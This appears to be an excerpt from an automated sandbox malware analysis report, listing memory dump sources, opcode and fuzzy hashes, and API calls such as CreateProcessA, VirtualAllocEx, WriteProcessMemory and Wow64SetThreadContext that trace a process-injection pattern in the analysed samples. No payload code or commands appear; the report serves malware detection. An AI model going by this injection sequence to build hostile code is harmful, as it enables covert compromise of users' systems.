                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4abe66b13036ec07a6fe499f439ab07206d97fd97daea4fff5c66b46783e0cad
                        • Instruction ID: 6d3de53372036b97196a19924b699114a8b29f77cc17b13a347388d2fcd4d9b3
                        • Opcode Fuzzy Hash: 4abe66b13036ec07a6fe499f439ab07206d97fd97daea4fff5c66b46783e0cad
                        • Instruction Fuzzy Hash: A3C09B75154241DF8681BF58D9C4C5A7EE5FF56300B41DD56F18546430DB31C5389713
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d92d1fba5427a8609cd0348be28fa8b806663311d98864e37e6ca1bacf82a7f6
                        • Instruction ID: f7f01a51897ec0558dea8213cf09f0eb7f97c628bef0d803ca2e46aec8508d56
                        • Opcode Fuzzy Hash: d92d1fba5427a8609cd0348be28fa8b806663311d98864e37e6ca1bacf82a7f6
                        • Instruction Fuzzy Hash: 00C002B4D3C248CFDB62BFA1D4544BC7F79AA1B201F21465A91B7A7252C6202904CF15
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29a15216351ca6c3cfd219366c9480179f24db80a5d46023792d43891d0393ee
                        • Instruction ID: c121a5dca3f099c88308d21195e77bdf95840e18e6732bdce24d6a018dc843fb
                        • Opcode Fuzzy Hash: 29a15216351ca6c3cfd219366c9480179f24db80a5d46023792d43891d0393ee
                        • Instruction Fuzzy Hash: A6B012F5264340E960407AF48880A7F7C61EBB3B00F40DE6F33CD00040C9705466D13B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f7f54f5ff13b03c1a33e64e240fe6406a9ecd09a7c23d75daeabb4e1b690f0b8
                        • Instruction ID: b18f9529edfe475b2d1460f68547ff8b71bfec10d801e69e7b26d32fac5ba838
                        • Opcode Fuzzy Hash: f7f54f5ff13b03c1a33e64e240fe6406a9ecd09a7c23d75daeabb4e1b690f0b8
                        • Instruction Fuzzy Hash: D3B0122500374403E1014220CBC2383D7C0A741808F89418448C045FC1D20483079200
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0c3dc309454833257168a197c388ae12bed5593f624bd22ff657dd2ff0bceb9
                        • Instruction ID: c38b45f269304c021985c73fcaa73a6748df2ea54b63cefcba37554770d2cb62
                        • Opcode Fuzzy Hash: a0c3dc309454833257168a197c388ae12bed5593f624bd22ff657dd2ff0bceb9
                        • Instruction Fuzzy Hash: 32C048B0D2C208CFDB61AFA1D4484BDBF79AB0E601F204629A077A3202CA202800CF00
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aff79ee5ec981dcc1650cdaa2a12fe593b0502e0466ba6b5bbd09ef34481fc13
                        • Instruction ID: e11b802c6f6e8868a8888cd47832228d7376945527d9f515b302f4923d230483
                        • Opcode Fuzzy Hash: aff79ee5ec981dcc1650cdaa2a12fe593b0502e0466ba6b5bbd09ef34481fc13
                        • Instruction Fuzzy Hash: F6E1FAB4E00259CFDB14DF99C590AAEFBB2BF89305F248269D414A7355D730AD42CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a612b011ebdccb491b3f0674a3cf1dcc350acf92754d9600b6c7412e78c962ca
                        • Instruction ID: 88fb1e17b0706124eca5ad6d65baf82d63f6e0514787a6ffd7221cb700d3a65b
                        • Opcode Fuzzy Hash: a612b011ebdccb491b3f0674a3cf1dcc350acf92754d9600b6c7412e78c962ca
                        • Instruction Fuzzy Hash: 2EE10BB4E00259CFDB14DFA9C590AAEFBB2BF49305F248269D414A7355D730AD42CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ff66737607e8ea067dca301c21a1093f02c46a883641c1640a44c8164ca7d52
                        • Instruction ID: 60d83429bfea52184161417323afc0e6db08313c88c032517de6b222dc765728
                        • Opcode Fuzzy Hash: 5ff66737607e8ea067dca301c21a1093f02c46a883641c1640a44c8164ca7d52
                        • Instruction Fuzzy Hash: 9EE1FAB4E00259CFDB14DFA9C590AAEFBB2BF49305F248269D414AB355D730AD42CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2936f234c45385eeffccf9be2aa8b363489949e1cd77b1f0d5e67cffeaefe0ba
                        • Instruction ID: c075e49d6a1a3281dfefff56da1f0c166d02e86749b290b4c32eeeb84baeabca
                        • Opcode Fuzzy Hash: 2936f234c45385eeffccf9be2aa8b363489949e1cd77b1f0d5e67cffeaefe0ba
                        • Instruction Fuzzy Hash: 5FE1FDB4E012598FDB14DFA9C590AAEFBB2FF49305F248269D414AB355D730AD42CFA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13cff02814970e2e498a4b3cdd2537815528552a0631a3197b453b5d1c49f9f2
                        • Instruction ID: 0dcace36d7df2b59a25a5ceb7403750c73846a65ac2e492d115783acda84e3fc
                        • Opcode Fuzzy Hash: 13cff02814970e2e498a4b3cdd2537815528552a0631a3197b453b5d1c49f9f2
                        • Instruction Fuzzy Hash: CFE11CB4E002598FDB14DFA9C590AAEFBB2FF49305F248269D414AB355D770AD42CFA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37f55eab00859198f8c02f60a65017b4fc608157b10be572a5337c5f506e1cb7
                        • Instruction ID: 0b00667d8d1e087588f63ad163a24f946695bd0423068c3cade74acbda6cfb19
                        • Opcode Fuzzy Hash: 37f55eab00859198f8c02f60a65017b4fc608157b10be572a5337c5f506e1cb7
                        • Instruction Fuzzy Hash: 0CD1073192075ACACB00EB64D990A99BBB1FF95300F50D79AE40977221EF706EC9CF91
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 193ae00cfec41424ffd871f65784153c13dc1d8ffca7ff53671324be1f0a6652
                        • Instruction ID: 9f169fe24e174841b1ece2b7d4975162b292ab5b852686720a6f471b1fd06725
                        • Opcode Fuzzy Hash: 193ae00cfec41424ffd871f65784153c13dc1d8ffca7ff53671324be1f0a6652
                        • Instruction Fuzzy Hash: 30A13A32A002198FCF05DFB4C94499EBBB2FF89304B15857AE907AB366DB31E955CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cf51581c912f6fd80a742e60e377e656bd03389f4da3a85c9baf9f51a8a5541
                        • Instruction ID: 762b8e5cc19369a6a234602988b880782b6d0dc4151cae1a97407c5db8212671
                        • Opcode Fuzzy Hash: 5cf51581c912f6fd80a742e60e377e656bd03389f4da3a85c9baf9f51a8a5541
                        • Instruction Fuzzy Hash: E0D1073192075ACADB00EB64D990A99BBB1FF95300F50D79AE40977221EF706EC9CF91
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 206ff49221355c214e81d2041e08cf0d6b02885713210f00fd7118085e6d0bd6
                        • Instruction ID: 9433c0252f10ab1aa20c8e6c1c92d19738f9f76f935cbe732a579ac4c0640053
                        • Opcode Fuzzy Hash: 206ff49221355c214e81d2041e08cf0d6b02885713210f00fd7118085e6d0bd6
                        • Instruction Fuzzy Hash: A4516D71A14604CFD748EF3AE852A9A7FE3BBD8300F04C169D00D9B269EF74250ADB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10eec52b7c8af2ac24c0a50f7d09ce229db5e186db8a69eb32ee29d2ebfa211a
                        • Instruction ID: ac103f4e89553c025982ff1ef00be24a899ce2a170a96e89f9d974c93b4f2490
                        • Opcode Fuzzy Hash: 10eec52b7c8af2ac24c0a50f7d09ce229db5e186db8a69eb32ee29d2ebfa211a
                        • Instruction Fuzzy Hash: 15514DB4E012598FDB15CFA9C5906AEFBF2BF89304F24816AD418A7356D7309D42CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb8d5b2e6dd0338fe7de005607cf8715e7190bc69d8f0812a5104f2bbbb48741
                        • Instruction ID: 3949286efbc69c733fc6f50d45b3cf488d4c22ae785172649f43fdfc47537135
                        • Opcode Fuzzy Hash: eb8d5b2e6dd0338fe7de005607cf8715e7190bc69d8f0812a5104f2bbbb48741
                        • Instruction Fuzzy Hash: B3510AB4E012598BDB14CFA9C5905AEFBB2FF89305F24816AD418A7356D7309E42CFA1

                        Execution Graph

                        Execution Coverage: 1.9%
                        Dynamic/Decrypted Code Coverage: 100%
                        Signature Coverage: 0%
                        Total number of Nodes: 2
                        Total number of Limit Nodes: 0

                        Control-flow Graph

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB0CF
                        Memory Dump Source
                        • Source File: 00000009.00000002.4632164398.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_15d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: cf5722fe992c6ef3144507ab4c41ed8c3d3e26bf9cb98587725ceeb697950613
                        • Instruction ID: 8ab3d792e8c904909ac65b7e07a4ad6069d7e9d563e256c2bf12919fd17359e7
                        • Opcode Fuzzy Hash: cf5722fe992c6ef3144507ab4c41ed8c3d3e26bf9cb98587725ceeb697950613
                        • Instruction Fuzzy Hash: B721E4B59002099FDB10CF9AD984ADEFFF5FB48320F14841AE914A7350D375A950CF61

                        Control-flow Graph

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB0CF
                        Memory Dump Source
                        • Source File: 00000009.00000002.4632164398.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_15d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: e796785b95afc3cc545ee182475b05960304dca87198e4ab56316fd29f840ee4
                        • Instruction ID: 9b120adbd499756fb74f6f8c6f128aaa25705549086a384631769f715a9440ed
                        • Opcode Fuzzy Hash: e796785b95afc3cc545ee182475b05960304dca87198e4ab56316fd29f840ee4
                        • Instruction Fuzzy Hash: 8021CFB5D00209DFDB10CFAAD984AEEBBF5FB48320F14841AE918A7350D379A954CF61

                        Control-flow Graph

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB0CF
                        Memory Dump Source
                        • Source File: 00000009.00000002.4632164398.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_15d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: dfb46db5bd896897bebcec535f7256b2c46e7c88c098c749a387f7ef3ecafb2c
                        • Instruction ID: 740827278ea61e0e71b67eafc5cba1b3535c1629820e8a598e77a32a882fc9ba
                        • Opcode Fuzzy Hash: dfb46db5bd896897bebcec535f7256b2c46e7c88c098c749a387f7ef3ecafb2c
                        • Instruction Fuzzy Hash: 6601D3B69002099FEB10CF99D884ADEBBF5EF48324F14850AEA14A7250C375A8518B61

                        Execution Graph

                        Execution Coverage: 9.7%
                        Dynamic/Decrypted Code Coverage: 100%
                        Signature Coverage: 0%
                        Total number of Nodes: 199
                        Total number of Limit Nodes: 12
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 885b2881e5f293d5bf3a6966ca95449c3bfa7cd89cf232dcadeab7cba506138b
                        • Instruction ID: bd38f0103e395c0c406492a2ffc7472b8f70c84a845047ace9f0072de0bc9e6d
                        • Opcode Fuzzy Hash: 885b2881e5f293d5bf3a6966ca95449c3bfa7cd89cf232dcadeab7cba506138b
                        • Instruction Fuzzy Hash: F5623575A00219DFDB54DFA8C984A9DBBB2FF88304F1581A9E509AB366DB31EC51CF40

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07826456
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 8ce075468a30f5838d1e990c2aa277a949c9373d90334f829bb0e1d753091370
                        • Instruction ID: 68c55ac51e4f17713cea329f9590d4fdd2e9e89356b383fe92ebbcc7464a71c9
                        • Opcode Fuzzy Hash: 8ce075468a30f5838d1e990c2aa277a949c9373d90334f829bb0e1d753091370
                        • Instruction Fuzzy Hash: DEA15CB1E0026ADFEF14CF68C9407DDBBB2AF48311F1481A9D848E7240EB749986DF91

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07826456
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 272be4956ca9c675838d60659477353a09cf2b320b88dcb3549caa7058b1b3c2
                        • Instruction ID: da30b453e34d26855cccc2cfbf77093d74cf9a739e020dc39bbd30b373c5b7f6
                        • Opcode Fuzzy Hash: 272be4956ca9c675838d60659477353a09cf2b320b88dcb3549caa7058b1b3c2
                        • Instruction Fuzzy Hash: 4A914BB1E0022ADFEF14CF68C9417DDBAB2AF48311F148169E849E7640EB749985DF91

                        Control-flow Graph

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B65E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 6813307d9c4cf84d9637409124b1e34855478f66e305a23b0015f45f6fa3f300
                        • Instruction ID: 4ad66618a0f11d09f8e2bea4f9851feaab57321f34d378f9579dd88a2b854bea
                        • Opcode Fuzzy Hash: 6813307d9c4cf84d9637409124b1e34855478f66e305a23b0015f45f6fa3f300
                        • Instruction Fuzzy Hash: B6815670A00B058FE765DF29C44079ABBF1FF88704F00896DD48AD7A91DB75E949CB91

                        Control-flow Graph

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 01006099
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 98b8bdca39065854cf170b33447c029e11aceb9642c5b38a6a08792849d9ceea
                        • Instruction ID: 334f7eba4ffe41f3d8fbaabfe03600b64c644fa4056b65af088e86be11d5c800
                        • Opcode Fuzzy Hash: 98b8bdca39065854cf170b33447c029e11aceb9642c5b38a6a08792849d9ceea
                        • Instruction Fuzzy Hash: B241E2B0C0071DCBEB25DFA9C944B9EBBF6BF48304F20806AD509AB251DB756945CF90

                        Control-flow Graph

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 01006099
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: b403e9dafacc468b0218c1d9ddd99897e796a96215894e0c0deb8a53e61d5ffd
                        • Instruction ID: a8b324f95ea2011ce6f099f51f7783c2789fcf48d8b2b4dadc3661cb0128b13f
                        • Opcode Fuzzy Hash: b403e9dafacc468b0218c1d9ddd99897e796a96215894e0c0deb8a53e61d5ffd
                        • Instruction Fuzzy Hash: 1641F1B0C00719CBEB25DFA9C844BDEBBB6BF48304F24816AD549AB251DB716946CF50

                        Control-flow Graph

                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07825E7E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: ed1e18ff0dbe2707d27fba1e5ef5f8594d0059a2a3df3d450c5c31a4a78b96ac
                        • Instruction ID: 701a80d685da618d625a7e10abe10b5e2f32b218f6fbd99d792ff0175a43dc62
                        • Opcode Fuzzy Hash: ed1e18ff0dbe2707d27fba1e5ef5f8594d0059a2a3df3d450c5c31a4a78b96ac
                        • Instruction Fuzzy Hash: 9331CBB69003599FDB10CFA9C8857EEFBF4EF48224F14846AE558AB241C7789546CB90

                        Control-flow Graph

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07826028
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: bd0b900f6148d569d68dacf598c8535a488fed94dfecc29db3932df4ea1fb7bc
                        • Instruction ID: bd3bda2d882ae7eecf635f03d498f603b195efb03f13358a758f4052ea4c0b81
                        • Opcode Fuzzy Hash: bd0b900f6148d569d68dacf598c8535a488fed94dfecc29db3932df4ea1fb7bc
                        • Instruction Fuzzy Hash: C03149B190035ADFDF10CFA9C884BDEBBF5EF48310F10842AE919A7240D7B59555DBA4

                        Control-flow Graph

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07826028
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: db608c924153085278b73c7db9ee63e8dd2017662c0db226f6bd79300567854f
                        • Instruction ID: a512d61cfd388f971cc3ac1464a7803045af804ddc8a99ef00c4b9047179da59
                        • Opcode Fuzzy Hash: db608c924153085278b73c7db9ee63e8dd2017662c0db226f6bd79300567854f
                        • Instruction Fuzzy Hash: 692126B190035A9FDF10CFAAC881BDEBBF5FF48310F10842AE919A7240D7789955DBA4

                        Control-flow Graph

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07826108
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 023ad419cdbdc5fc3654888a4545e170c8f7bf7ebea6f16ebb5fcb4a71c35041
                        • Instruction ID: 47aac6876b63e52ddb95394039ac04a2fb58134bcc3f666adbd44d6e420d1c0a
                        • Opcode Fuzzy Hash: 023ad419cdbdc5fc3654888a4545e170c8f7bf7ebea6f16ebb5fcb4a71c35041
                        • Instruction Fuzzy Hash: E82127B190035ADFDB10CFAAC841ADEFBF5FF48320F108529E519A7241D774A951DBA4

                        Control-flow Graph

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0100DC96,?,?,?,?,?), ref: 0100DD57
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: f83363c4b38fe7290398e7bcd371211b029669e5b3430279520cc456adbc3c66
                        • Instruction ID: 97d8014faba1d2f6a4a2092a2cfc2873ed6e508ddd9e1ec7804459c13e5c6e23
                        • Opcode Fuzzy Hash: f83363c4b38fe7290398e7bcd371211b029669e5b3430279520cc456adbc3c66
                        • Instruction Fuzzy Hash: 052103B5900249EFDB10CFAAD984ADEBFF5EB48320F14801AE918A3350D374A950CFA4

                        Control-flow Graph

                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07825E7E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 4a578f1d1035f16355fe1dbddb134a1a574fde6a1071e680f132c053abed52c8
                        • Instruction ID: 98c75da1a40ae95cb4b42620320e78442de309a91c6aae15c3e3f68dbaad230b
                        • Opcode Fuzzy Hash: 4a578f1d1035f16355fe1dbddb134a1a574fde6a1071e680f132c053abed52c8
                        • Instruction Fuzzy Hash: E62149B19003099FDB10DFAAC4857EEBBF5EF88324F14842AD519A7240CB789945CFA5

                        Control-flow Graph

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07826108
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 048ba371ead6034cc6571bfacd0df09532c2482c37aa778c12823c969e9a4e46
                        • Instruction ID: ea178e5e8d4b2a7886a6e12651b98434351cbf29e69db328d122cd18af13cfee
                        • Opcode Fuzzy Hash: 048ba371ead6034cc6571bfacd0df09532c2482c37aa778c12823c969e9a4e46
                        • Instruction Fuzzy Hash: DA214AB19003599FDF10CFAAC841BDEBBF5FF48310F108429E519A7240D7749550CBA0

                        Control-flow Graph
                        • Nodes: 279 [7825ed1-7825ed6]; 280 [7825ed8-7825ede]; 281 [7825edf-7825f53] calls VirtualAllocEx; 284 [7825f55-7825f5b]; 285 [7825f5c-7825f81]
                        • Edges: 279->280, 279->281, 280->281, 281->284, 281->285, 284->285
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07825F46
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 415b06daff0f81d20a3850dd54624f68e23cbff57a8d7001dfbbd37a403f5ea1
                        • Instruction ID: b8db7eb6e933b8cf9df2cdc9a87e0e2b4e9d294a8c1742ce06dcaac7e36bb9ce
                        • Opcode Fuzzy Hash: 415b06daff0f81d20a3850dd54624f68e23cbff57a8d7001dfbbd37a403f5ea1
                        • Instruction Fuzzy Hash: 692188728043899FDF10DFA9C841ADEBFF5EF88320F24885AE619A7240C7759954CBA1

                        Control-flow Graph
